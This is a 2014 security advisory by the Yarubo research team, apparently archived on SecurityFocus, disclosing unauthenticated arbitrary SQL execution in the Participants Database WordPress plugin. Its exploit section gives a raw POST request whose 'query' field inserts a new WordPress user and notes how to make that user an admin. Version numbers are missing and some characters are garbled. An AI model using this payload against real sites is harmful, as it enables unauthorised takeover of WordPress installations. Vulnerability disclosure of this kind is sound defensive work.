Yarubo #1: Arbitrary SQL Execution in Participants Database for Wordpress Jun 01 2014 06:28AM
Yarubo Internet Security Scan (no-reply yarubo com)
Yarubo #1: Arbitrary SQL Execution in Participants Database for Wordpress

Program: Participants Database <=
Severity: Unauthenticated attacker can fully compromise the Wordpress
Permalink: http://www.yarubo.com/advisories/1

â?? Info â??

Participants Database is a popular Wordpress plugin that offers the
functionality needed to build and maintain a database of people. As of
today the plugin has been downloaded 92,089 times.

â?? Vulnerability details â??

1. If any of the shortcodes is used (e.g. signup page) then it is
possible for anonymous (unauthenticated) users to trigger some
administrative actions.

2. The action "export CSV" takes a parameter called "query" that can
contain an arbitrary SQL query. This means that an unauthenticated
user can execute arbitrary SQL statements (e.g. create an admin user,
read or write files, or execute code depending on the MySQL user

â?? Exploit â??

Add a user to wordpress as follows (if you want an admin user, add
admin privileges to wp_usermeta):

POST /wordpress/pdb-signup/ HTTP/1.1
Host: www.example.com
Content-Length: 789
Content-Type: multipart/form-data;

Content-Disposition: form-data; name="action"

output CSV
Content-Disposition: form-data; name="CSV_type"

participant list
Content-Disposition: form-data; name="subsource"

Content-Disposition: form-data; name="query"

INSERT INTO wp_users
VALUES (31337,0x74657374,0x245024425a7a59615354486f41364b693355363576772f546147


â?? Solution â??

This issue has been fixed in version Download the newest version from:


â?? Credit â??

Yarubo Research Team
research [at] yarubo.com

Network Security Scan:

Free Heartbleed Scan:

[ reply ]


Privacy Statement
Copyright 2010, SecurityFocus